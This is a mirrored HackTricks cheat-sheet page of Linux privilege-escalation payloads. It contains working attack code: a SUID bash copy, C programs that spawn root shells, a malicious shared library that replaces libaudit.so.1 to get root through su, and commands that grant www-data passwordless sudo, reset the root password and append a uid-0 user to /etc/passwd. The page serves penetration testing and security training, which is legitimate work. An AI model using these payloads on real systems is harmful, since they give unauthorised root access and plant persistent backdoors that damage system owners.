mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-18 17:16:10 +00:00
161 lines
5.6 KiB
Markdown
161 lines
5.6 KiB
Markdown
# Payloads to execute
|
|
|
|
{% hint style="success" %}
|
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
{% endhint %}
|
|
|
|
## Bash
|
|
|
|
```bash
|
|
cp /bin/bash /tmp/b && chmod +s /tmp/b
|
|
/bin/b -p #Maintains root privileges from suid, working in debian & buntu
|
|
```
|
|
|
|
## C
|
|
|
|
```c
|
|
//gcc payload.c -o payload
|
|
int main(void){
|
|
setresuid(0, 0, 0); //Set as user suid user
|
|
system("/bin/sh");
|
|
return 0;
|
|
}
|
|
```
|
|
|
|
```c
|
|
//gcc payload.c -o payload
|
|
#include <stdio.h>
|
|
#include <unistd.h>
|
|
#include <sys/types.h>
|
|
|
|
int main(){
|
|
setuid(getuid());
|
|
system("/bin/bash");
|
|
return 0;
|
|
}
|
|
```
|
|
|
|
```c
|
|
// Privesc to user id: 1000
|
|
#define _GNU_SOURCE
|
|
#include <stdlib.h>
|
|
#include <unistd.h>
|
|
|
|
int main(void) {
|
|
char *const paramList[10] = {"/bin/bash", "-p", NULL};
|
|
const int id = 1000;
|
|
setresuid(id, id, id);
|
|
execve(paramList[0], paramList, NULL);
|
|
return 0;
|
|
}
|
|
```
|
|
|
|
## Overwriting a file to escalate privileges
|
|
|
|
### Common files
|
|
|
|
* Add user with password to _/etc/passwd_
|
|
* Change password inside _/etc/shadow_
|
|
* Add user to sudoers in _/etc/sudoers_
|
|
* Abuse docker through the docker socket, usually in _/run/docker.sock_ or _/var/run/docker.sock_
|
|
|
|
### Overwriting a library
|
|
|
|
Check a library used by some binary, in this case `/bin/su`:
|
|
|
|
```bash
|
|
ldd /bin/su
|
|
linux-vdso.so.1 (0x00007ffef06e9000)
|
|
libpam.so.0 => /lib/x86_64-linux-gnu/libpam.so.0 (0x00007fe473676000)
|
|
libpam_misc.so.0 => /lib/x86_64-linux-gnu/libpam_misc.so.0 (0x00007fe473472000)
|
|
libaudit.so.1 => /lib/x86_64-linux-gnu/libaudit.so.1 (0x00007fe473249000)
|
|
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe472e58000)
|
|
libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fe472c54000)
|
|
libcap-ng.so.0 => /lib/x86_64-linux-gnu/libcap-ng.so.0 (0x00007fe472a4f000)
|
|
/lib64/ld-linux-x86-64.so.2 (0x00007fe473a93000)
|
|
```
|
|
|
|
In this case lets try to impersonate `/lib/x86_64-linux-gnu/libaudit.so.1`.\
|
|
So, check for functions of this library used by the **`su`** binary:
|
|
|
|
```bash
|
|
objdump -T /bin/su | grep audit
|
|
0000000000000000 DF *UND* 0000000000000000 audit_open
|
|
0000000000000000 DF *UND* 0000000000000000 audit_log_user_message
|
|
0000000000000000 DF *UND* 0000000000000000 audit_log_acct_message
|
|
000000000020e968 g DO .bss 0000000000000004 Base audit_fd
|
|
```
|
|
|
|
The symbols `audit_open`, `audit_log_acct_message`, `audit_log_acct_message` and `audit_fd` are probably from the libaudit.so.1 library. As the libaudit.so.1 will be overwritten by the malicious shared library, these symbols should be present in the new shared library, otherwise the program will not be able to find the symbol and will exit.
|
|
|
|
```c
|
|
#include<stdio.h>
|
|
#include<stdlib.h>
|
|
#include<unistd.h>
|
|
|
|
//gcc -shared -o /lib/x86_64-linux-gnu/libaudit.so.1 -fPIC inject.c
|
|
|
|
int audit_open;
|
|
int audit_log_acct_message;
|
|
int audit_log_user_message;
|
|
int audit_fd;
|
|
|
|
void inject()__attribute__((constructor));
|
|
|
|
void inject()
|
|
{
|
|
setuid(0);
|
|
setgid(0);
|
|
system("/bin/bash");
|
|
}
|
|
```
|
|
|
|
Now, just calling **`/bin/su`** you will obtain a shell as root.
|
|
|
|
## Scripts
|
|
|
|
Can you make root execute something?
|
|
|
|
### **www-data to sudoers**
|
|
|
|
```bash
|
|
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
|
|
```
|
|
|
|
### **Change root password**
|
|
|
|
```bash
|
|
echo "root:hacked" | chpasswd
|
|
```
|
|
|
|
### Add new root user to /etc/passwd
|
|
|
|
```bash
|
|
echo hacker:$((mkpasswd -m SHA-512 myhackerpass || openssl passwd -1 -salt mysalt myhackerpass || echo '$1$mysalt$7DTZJIc9s6z60L6aj0Sui.') 2>/dev/null):0:0::/:/bin/bash >> /etc/passwd
|
|
```
|
|
|
|
{% hint style="success" %}
|
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
{% endhint %}
|